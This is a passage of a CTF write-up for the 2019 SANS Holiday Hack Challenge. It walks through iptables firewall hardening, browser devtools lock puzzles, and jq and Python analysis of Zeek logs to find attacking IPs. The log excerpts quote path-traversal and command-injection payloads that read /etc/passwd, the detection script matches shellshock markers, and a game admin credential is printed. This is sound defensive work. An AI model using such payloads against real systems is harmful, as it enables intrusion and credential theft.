Key-Used: b5ad6a321240fbec - TimeStamp: 1575663650 - First-4-Chars: %PDF...
~/elfscrow ▶

After running this program, it will save the pdf in the same directory where it is executed with the decrypted file. Opening the pdf we can finally recover the solution to this objective:

Machine Learning Sleigh Route Finder

Open the Sleigh Shop Door

Sat, 28 Dec 2019 00:00:00 +0100

IPs or Tables? What?!

Instructions in your personal badge:

Visit Shinny Upatree in the Student Union and help solve their problem. What is written on the paper you retrieve for Shinny? For hints on achieving this objective, please visit the Student Union and talk with Kent Tinseltooth.

Once you teleport to the Student Union building through the air-vents system, you can get further hints from Kent, but first he needs your help with something quite urgent!

OK, this is starting to freak me out! Oh sorry, I’m Kent Tinseltooth. My Smart Braces are acting up. Do… Do you ever get the feeling you can hear things? Like, voices? I know, I sound crazy, but ever since I got these… Oh! Do you think you could take a look at my Smart Braces terminal? I’ll bet you can keep other students out of my head, so to speak. It might just take a bit of Iptables work.

So after you get the hints from Kent about his problem, you can investigate further in the terminal device next to him:

Inner Voice: Kent. Kent. Wake up, Kent.
Inner Voice: I'm talking to you, Kent.
Kent TinselTooth: Who said that? I must be going insane.
Kent TinselTooth: Am I?
Inner Voice: That remains to be seen, Kent. But we are having a conversation.
Inner Voice: This is Santa, Kent, and you've been a very naughty boy.
Kent TinselTooth: Alright! Who is this?! Holly? Minty? Alabaster?
Inner Voice: I am known by many names. I am the boss of the North Pole. Turn to me and be hired after graduation.
Kent TinselTooth: Oh, sure.
Inner Voice: Cut the candy, Kent, you've built an automated, machine-learning, sleigh device.
Kent TinselTooth: How did you know that?
Inner Voice: I'm Santa - I know everything.
Kent TinselTooth: Oh. Kringle. *sigh*
Inner Voice: That's right, Kent. Where is the sleigh device now?
Kent TinselTooth: I can't tell you.
Inner Voice: How would you like to intern for the rest of time?
Kent TinselTooth: Please no, they're testing it at srf.elfu.org using default creds, but I don't know more. It's classified.
Inner Voice: Very good Kent, that's all I needed to know.
Kent TinselTooth: I thought you knew everything?
Inner Voice: Nevermind that. I want you to think about what you've researched and studied. From now on, stop playing with your teeth, and floss more.
Kent TinselTooth: Oh no, I sure hope that voice was Santa's.
Kent TinselTooth: I suspect someone may have hacked into my IOT teeth braces.
Kent TinselTooth: I must have forgotten to configure the firewall...
Kent TinselTooth: Please review /home/elfuuser/IOTteethBraces.md and help me configure the firewall.
Kent TinselTooth: Please hurry; having this ribbon cable on my teeth is uncomfortable.
elfuuser@b17a1f97bf17:~$ cat /home/elfuuser/IOTteethBraces.md
# ElfU Research Labs - Smart Braces
### A Lightweight Linux Device for Teeth Braces
### Imagined and Created by ElfU Student Kent TinselTooth
This device is embedded into one's teeth braces for easy management and monitoring of dental status. It uses FTP and HTTP for management and monitoring purposes but also has SSH for remote access. Please refer to the management documentation for this purpose.
## Proper Firewall configuration:
The firewall used for this system is `iptables`. The following is an example of how to set a default policy with using `iptables`:
sudo iptables -P FORWARD DROP
The following is an example of allowing traffic from a specific IP and to a specific port:
sudo iptables -A INPUT -p tcp --dport 25 -s 172.18.5.4 -j ACCEPT
A proper configuration for the Smart Braces should be exactly:
1. Set the default policies to DROP for the INPUT, FORWARD, and OUTPUT chains.
2. Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED on the INPUT and the OUTPUT chains.
3. Create a rule to ACCEPT only remote source IP address 172.19.0.225 to access the local SSH server (on port 22).
4. Create a rule to ACCEPT any source IP to the local TCP services on ports 21 and 80.
5. Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80.
6. Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface.
elfuuser@b17a1f97bf17:~$

In order to solve this technical challenge, you need to follow the instructions at the end of the IOTteethBraces.md file and implement the necessary IPTables rules to stop whoever is messing with Kent’s smart braces. I found this task to be quite straightforward, so I will just list the necessary commands below:

elfuuser@4f938dab4458:~$ sudo iptables -P INPUT DROP
elfuuser@4f938dab4458:~$ sudo iptables -P OUTPUT DROP
elfuuser@4f938dab4458:~$ sudo iptables -P FORWARD DROP
elfuuser@4f938dab4458:~$ sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A INPUT -s 172.19.0.225 -p tcp --dport 22 -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A INPUT -i lo -j ACCEPT
elfuuser@4f938dab4458:~$ Kent TinselTooth: Great, you hardened my IOT Smart Braces firewall!

Finally, the additional hints from Kent are revealed:

Oh thank you! It’s so nice to be back in my own head again. Er, alone. By the way, have you tried to get into the crate in the Student Union? It has an interesting set of locks. There are funny rhymes, references to perspective, and odd mentions of eggs! And if you think the stuff in your browser looks strange, you should see the page source… Special tools? No, I don’t think you’ll need any extra tooling for those locks. BUT - I’m pretty sure you’ll need to use Chrome’s developer tools for that one. Or sorry, you’re a Firefox fan? Yeah, Safari’s fine too - I just have an ineffible hunger for a physical Esc key. Edge? That’s cool. Hm? No no, I was thinking of an unrelated thing. Curl fan? Right on! Just remember: the Windows one doesn’t like double quotes. Old school, huh? Oh sure - I’ve got what you need right here..

HODOR!?! - Main Objective

To kick off solving of this main objective, let’s go over to Shinny by the door to the right and talk with him:

Psst - hey! I’m Shinny Upatree, and I know what’s going on! Yeah, that’s right - guarding the sleigh shop has made me privvy to some serious, high-level intel. In fact, I know WHO is causing all the trouble. Cindy? Oh no no, not that who. And stop guessing - you’ll never figure it out. The only way you could would be if you could break into my crate, here. You see, I’ve written the villain’s name down on a piece of paper and hidden it away securely!

Next you should click on the crate next to the door, in the corner, and open it in a new tab: https://sleighworkshopdoor.elfu.org/. This will open web interface with 10 locks you need to open for the door to open up.

They all look like the one above. Each lock also contains some short hint for solving it. As Kent noted, you need to get comfortable with the Developer tools of your chosen browser client. I use Google Chrome now, so this solution will include instruction for that environment.

Lock 1

I locked the crate with the villain’s name inside. Can you get it out?

Hint: Look into the console of your browser and see the code appear there:

Lock 2

Some codes are hard to spy, perhaps they’ll show up on pulp with dye?

Hint: Open print preview, and see the code appear on the page next to the 2nd lock:

Lock 3

This code is still unknown; it was fetched but never shown.

Hint: Open the Developer tools and check the Network tab for any resources fetched, you will see a png file that holds the code.

Lock 4

Where might we keep the things we forage? Yes, of course: Local barrels!

Hint: Pretty straightforward hint, go to Developer tools, Local storage and look for the code there.

Lock 5

Did you notice the code in the title? It may very well prove vital.

Hint: Hover over the browser tab, to reveal its title and the code hiding in the 2nd line. Alternatively, you can check the HTML source and browse to the <title> attribute to see the code.

Lock 6

In order for this hologram to be effective, it may be necessary to increase your perspective.

Hint: This was the first lock that was not so straightforward. There is some help in the hint that can be clicked under the text instruction. Also note the colourful card next to the lock with some characters on it already. It is likely that you need to increase the perspective property of that element in CSS editor, as pointed out in the hint. Some value in the thousands should be high enough to be able to read the code on the hologram card.

Lock 7

The font you’re seeing is pretty slick, but this lock’s code was my first pick. In the font-family css property, you can list multiple fonts, and the first available font on the system will be used.

Hint: You should check the font-family property of the text which conveys the hint, and see the code hidden there…

Lock 8

In the event that the .eggs go bad, you must figure out who will be sad. Google: “[your browser name] view event handlers”

Hint: You need to check the events related to the .eggs span in the hint paragraph. It hides the code you need.

Lock 9

This next code will be unredacted, but only when all the chakras are :active. It is a css pseudo class that is applied on elements in an active state. Google: “[your browser name] force psudo classes”

Hint: For this lock, you need to add the :active: property to all chakra spans, so they each reveal some fragment of the code.

Lock 10

Oh, no! This lock’s out of commission! Pop off the cover and locate what’s missing.

Hint: For this lock, you need to learn how to drag and drop HTML elements in the DOM tree explorer. Once you locate the <div> for the lock’s cover, move it somewhere else to peek under it, and notice on the PCB board’s right edge the code. Write it down, them put the cover back and type it in to solve this lock.

However, when you type in the code and double-checked it twice to make sure there are no typos, you will notice that it wouldn’t unlock. Upon further investigation you can see an error message in the console output:

899c65f3-6ffa-4b5b-8214-73e08788bc80:1 Error: Missing macaroni!
at HTMLButtonElement.<anonymous> (899c65f3-6ffa-4b5b-8214-73e08788bc80:1)
(anonymous) @ 899c65f3-6ffa-4b5b-8214-73e08788bc80:1

So the lock seems to want some macaroni. If you search for it in the HTML page source you will find a div:

Drag and drop this into the last lock’s div to fix the error. Tip: you will need to this this twice more to fix two errors of the same kind: missing swab and missing gnome. Once these errors are fixed you can click UNLOCK and solve the challenge. The answer:

The Tooth Fairy

Poisoned Weather Data

Sat, 28 Dec 2019 00:00:00 +0100

Zeek no more!

Instructions in your badge:

Use the data supplied in the Zeek JSON logs to identify the IP addresses of attackers poisoning Santa’s flight mapping software. Block the 100 offending sources of information to guide Santa’s sleigh through the attack. Submit the Route ID (“RID”) success value that you’re given. For hints on achieving this objective, please visit the Sleigh Shop and talk with Wunorse Openslae.

Links from hint:

Once you enter the Sleigh Shop Door, you will be greeted with these bunch:

The Tooth Fairy greets you with the following:

I’m the Tooth Fairy, the mastermind behind the plot to destroy the holiday season. I hate how Santa is so beloved, but only works one day per year! He has all of the resources of the North Pole and the elves to help him too. I run a solo operation, toiling year-round collecting deciduous bicuspids and more from children. But I get nowhere near the gratitude that Santa gets. He needs to share his holiday resources with the rest of us! But, although you found me, you haven’t foiled my plot! Santa’s sleigh will NOT be able to find its way. I will get my revenge and respect! I want my own holiday, National Tooth Fairy Day, to be the most popular holiday on the calendar!!!

Not a very good sign, but all is not lost yet. You should turn to Wunorse Openslae for some hints on defeating the Tooth Fairy, however he has a technical task for you before that:

Wunorse Openslae here, just looking at some Zeek logs. I’m pretty sure one of these connections is a malicious C2 channel… Do you think you could take a look? I hear a lot of C2 channels have very long connection times. Please use jq to find the longest connection in this data set. We have to kick out any and all grinchy activity!

Next, you open the terminal and get to work:

Some JSON files can get quite busy.
There's lots to see and do.
Does C&C lurk in our data?
JQ's the tool for you!
-Wunorse Openslae
Identify the destination IP address with the longest connection duration
using the supplied Zeek logfile. Run runtoanswer to submit your answer.
elf@3222ffd89de4:~$ ls
conn.log
elf@3222ffd89de4:~$ cat conn.log | wc -l
143679
elf@3222ffd89de4:~$

As you can see, it is a rather large log file, so you should use JQ to parse it. Since you are interested in the IP that belongs to the connection with longest duration, you should extract that field, then pipe the output through some unix tools that can help you find the highest value. Next you should run JQ once more to find the IP that belongs to this highest duration:

elf@3222ffd89de4:~$ cat conn.log | jq ".duration" | uniq | sort -g | tail -n 1
1019365.337758
elf@3222ffd89de4:~$ cat conn.log | jq ". | select (.duration == 1019365.337758)"
{
"ts": "2019-04-18T21:27:45.402479Z",
"uid": "CmYAZn10sInxVD5WWd",
"id.orig_h": "192.168.52.132",
"id.orig_p": 8,
"id.resp_h": "13.107.21.200",
"id.resp_p": 0,
"proto": "icmp",
"duration": 1019365.337758,
"orig_bytes": 30781920,
"resp_bytes": 30382240,
"conn_state": "OTH",
"missed_bytes": 0,
"orig_pkts": 961935,
"orig_ip_bytes": 57716100,
"resp_pkts": 949445,
"resp_ip_bytes": 56966700
}

To submit the answer execute the runtoanswer command on the terminal:

elf@3222ffd89de4:~$ runtoanswer
Loading, please wait......
What is the destination IP address with the longes connection duration? 13.107.21.200
Thank you for your analysis, you are spot-on.
I would have been working on that until the early dawn.
Now that you know the features of jq,
You'll be able to answer other challenges too.
-Wunorse Openslae
Congratulations!

Fixing the weather

So now you can attack the final objective and you also get some encouraging words from the Krampus in the room:

But there’s still time! Solve the final challenge in your badge by blocking the bad IPs at srf.elfu.org and save the holiday season!

Go to link: SRF

However, you notice that the website needs credentials before you can access it. Luckily, you remember the Elfscrow objective and the pdf document you successfully recovered, in which there was some good clues for how this can be achieved:

Link to the readme file: here and the credentials inside:

#### Logging in:
You can login using the default admin pass:
'admin 924158F9522B3744F5FCD4D10FAC4356'

After logging in, you can scroll down to see the Firewall section, which is where you will need to enter the IP addresses which you think are malicious, based on your analysis.

Weed out the bad IPs!

In order to find the list of IP addresses (around 100 or so in total, as pointed out in the objective) you need to download the Zeek logs from here, and run your analysis on them. At this point it is worth to go back to Wunorse to see hear his hints for the analysis task:

That’s got to be the one - thanks! Hey, you know what? We’ve got a crisis here. You see, Santa’s flight route is planned by a complex set of machine learning algorithms which use available weather data. All the weather stations are reporting severe weather to Santa’s Sleigh. I think someone might be forging intentionally false weather data. I’m so flummoxed I can’t even remember how to login! Hmm… Maybe the Zeek http.log could help us. I worry about LFI, XSS, and SQLi in the Zeek log - oh my! And I’d be shocked if there weren’t some shell stuff in there too. I’ll bet if you pick through, you can find some naughty data from naughty hosts and block it in the firewall. If you find a log entry that definitely looks bad, try pivoting off other unusual attributes in that entry to find more bad IPs. The sleigh’s machine learning device (SRF) needs most of the malicious IPs blocked in order to calculate a good route. Try not to block many legitimate weather station IPs as that could also cause route calculation failure. Remember, when looking at JSON data, jq is the tool for you!

He provides some very useful hints about LFI, XSS, SQLi and Shell exploits. In order to try to uncover the IP addresses that originate such attacks, I wrote a custom python script, which parsed the Zeek logs looking for signs of such exploits. More specifically for each category of exploits I looked for:

SQLi > presence of ' in uri, username or user_agent fields

XSS > presence of < in uri or host fields

LFI > presence of /passw in uri field

Shell > presence of ':;' or '};' in user_agent field

As an example, if I did a quick and dirty search for LFI exploits via cat and JQ:

cat http.log | jq '.[] | .uri' | grep /passw
"/api/weather?station_id=\"/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd"
"/api/weather?station_id=../../../../../../../../../../bin/cat /etc/passwd\\\\x00|"
"/api/stations?station_id=|cat /etc/passwd|"
"/api/weather?station_id=;cat /etc/passwd"
"/password/"
"/api/login?id=cat /etc/passwd||"
"/api/weather?station_id=`/etc/passwd`"
"/api/weather?station_id=/../../../../../../../../../../../etc/passwd"
"/gtcatalog/password.inc"
"/gtcatalog/password.inc"
"/api/login?id=/../../../../../../../../../etc/passwd"
"/password-manager-master/beta/index.html"
"/api/weather?station_id=/../../../../../../../../etc/passwd"
"/api/weather?station_id=/etc/passwd"
"/files/passwd.txt"
"/scripts/files/passwd.txt"
"/guestbook/files/passwd.txt"
"/api/login?id=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd"

Quite easily this search revealed some requests trying to gain access to the passwd file. Next, I took the specified search criteria and implemented them in a python script.

ips_blacklist = set() # collection of IP addresses deemed to be malicious
# load the json into logs object
logs = json.load(open("http.log"))
# iterate over entries and filter based on identified markers of IoC
for log in logs:
if ("'" in log['uri'] or "'" in log['username'] or
"'" in log['user_agent'] or "<" in log['uri'] or
"<" in log['host'] or "pass" in log['uri'] or
":;" in log['uri'] or "};" in log['uri']):
ips_blacklist.add(log['id.orig_h'])
# print IP blacklist for copy pasting into SRF FW
print(",".join(ips_blacklist))

This script loops through the Zeek logs and collects IP_address and user_agent values that we deem malicious. At the end it prints the collected IP addresses in a comma-separated manner in one line, which you can copy paste into the Firewall input field on the SRF website, then click Deny and see if you found enough.

After pasting in the script output and clicking DENY in the SRF firewall, the calculation still failed, most likely because only about 80 or so IP addresses were found via the above script. That seems short of the 100 which was mentioned in the objective. I turn to the hints from Wunorse again and notice this sentence:

If you find a log entry that definitely looks bad, try pivoting off other unusual attributes in that entry to find more bad IPs.

As a next step I extended the script and pivoted by looking for additional malicious IP addresses based on known bad user_agent strings. The idea was to loop through the log again, and see if the current entry’s user_agent matches any of the known malicious user_agent values in our ua_blacklist.

ips_blacklist = set() # set of IPs found to be malicious
ua_blacklist = list() # list so that later on we can count items that are added multiple times
# ... code removed for brevity
# collect new malicious agents that match existing ones but not in ips_blacklist
for log in logs:
if log['user_agent'] in ua_blacklist and log['id.orig_h'] not in ips_blacklist:
ips_blacklist.add(log['id.orig_h'])
ua_blacklist.append(log['user_agent'])

This however provided way too many IP addresses, more than 200, so it needs to be reduced somehow. For this I decided to create a third list for whitelisting user_agents strings that are found often enough to signal that it may be benign. After fiddling around with the right threshold, I came to the conclusion that if the same user_agent string is found more than 9 times in the ua_blacklist, then it could be safely added to a whitelist.

The full python script can be found below and also in this Github repo. It prints out 110 IP addresses, which is more or less close to 100, and more importantly is an accepted solution on the SRF Firewall.

import json
ips_blacklist = set() # set of IPs found to be malicious
ua_blacklist = list() # list so that later on we can count items that are added multiple times
ua_whitelist = set() # set of user_agents that are found to be benign
# load the json into logs object
logs = json.load(open("http.log"))
# iterate over entries and filter based on identified markers of IoC
for log in logs:
if ("'" in log['uri'] or "'" in log['username'] or
"'" in log['user_agent'] or "<" in log['uri'] or
"<" in log['host'] or "pass" in log['uri'] or
":;" in log['uri'] or "};" in log['uri']):
ips_blacklist.add(log['id.orig_h'])
ua_blacklist.append(log['user_agent'])
# collect new malicious agents that match existing ones but not in ips_blacklist
for log in logs:
if log['user_agent'] in ua_blacklist and log['id.orig_h'] not in ips_blacklist:
ua_blacklist.append(log['user_agent'])
# identifiy agents that are found more than 9 times > those should be benign and can be whitelisted
ua_blacklist_counts = { x : ua_blacklist.count(x) for x in ua_blacklist }
for i in ua_blacklist_counts:
if ua_blacklist_counts[i] >= 9:
ua_whitelist.add(i)
# identify additional IPs that are in ua_blacklist and not in ua_whitelist
for log in logs:
if log['user_agent'] in ua_blacklist and log['user_agent'] not in ua_whitelist and log['id.orig_h'] not in ips_blacklist :
ips_blacklist.add(log['id.orig_h'])
# print out comma separated string for pastin into srf.elfu.org firewall for DENY
print(",".join(ips_blacklist))

Output list of IP addresses that are most likely poisoning the weather API:

229.133.163.235,132.45.187.177,65.153.114.120,22.34.153.164,187.152.203.243,231.179.108.238,220.132.33.81,52.39.201.107,87.195.80.126,118.26.57.38,194.143.151.224,111.81.145.191,42.103.246.250,150.45.133.97,1.185.21.112,79.198.89.109,45.239.232.245,249.90.116.138,250.22.86.40,169.242.54.5,253.65.40.39,34.129.179.28,66.116.147.181,121.7.186.163,44.164.136.41,150.50.77.238,106.93.213.219,81.14.204.154,2.240.116.254,50.154.111.0,92.213.148.0,0.216.249.31,29.0.183.220,53.160.218.44,254.140.181.172,140.60.154.239,102.143.16.184,13.39.153.254,83.0.8.119,34.155.174.167,118.196.230.170,135.203.243.43,49.161.8.58,25.80.197.172,126.102.12.53,2.230.60.70,69.221.145.150,131.186.145.73,84.185.44.166,238.143.78.114,168.66.108.62,27.88.56.114,19.235.69.221,42.127.244.30,37.216.249.50,97.220.93.190,211.229.3.254,80.244.147.207,193.228.194.36,226.102.56.13,33.132.98.193,227.110.45.126,61.110.82.125,230.246.50.221,28.169.41.122,158.171.84.209,75.73.228.192,203.68.29.5,226.240.188.154,249.237.77.152,173.37.160.150,180.57.20.247,42.103.246.130,103.235.93.133,68.115.251.76,9.206.212.33,75.215.214.65,186.28.46.179,187.178.169.123,142.128.135.10,42.191.112.181,148.146.134.52,84.147.231.129,95.166.116.45,123.127.233.97,31.116.232.143,229.229.189.246,44.74.106.131,135.32.99.116,217.132.156.225,42.16.149.112,223.149.180.133,252.122.243.212,249.34.9.16,185.19.7.133,116.116.98.205,250.51.219.47,106.132.195.153,10.155.246.29,56.5.47.137,104.179.109.113,23.49.177.78,48.66.193.176,225.191.220.138,10.122.158.57,253.182.102.55,200.75.228.240,190.245.228.38,233.74.78.199,129.121.121.48

Once you submit this string and hit Deny, the calculator will start running and provide you with the RID that you need to submit for solving the final Objective.

RID: 0807198508261964

The Bell Tower

Once you submit the RID through your personal badge, you get access to The Bell Tower through the door that just opened in the Sleigh Shop. Go up and talk to the fellas for finishing this once and for all!

Santa seems quite grateful and happy:

You did it! Thank you! You uncovered the sinister plot to destroy the holiday season! Through your diligent efforts, we’ve brought the Tooth Fairy to justice and saved the holidays! Ho Ho Ho! The more I laugh, the more I fill with glee. And the more the glee, The more I’m a merrier me! Merry Christmas and Happy Holidays.

Next you get some good news from Krampus:

Congratulations on a job well done! Oh, by the way, I won the Frido Sleigh contest. I got 31.8% of the prizes, though I’ll have to figure that out.

Let’s hope he will share with others, his lifetime supply of cookiez… :) However, quite understandably, The Tooth Fairy is not as jolly as the Krampus:

You foiled my dastardly plan! I’m ruined! And I would have gotten away with it too, if it weren’t for you meddling kids!

Whats more, there is a suspicious note in the corner which seems to suggest we probably cannot rest for too long, before the villains return and try to ruin the holiday once again…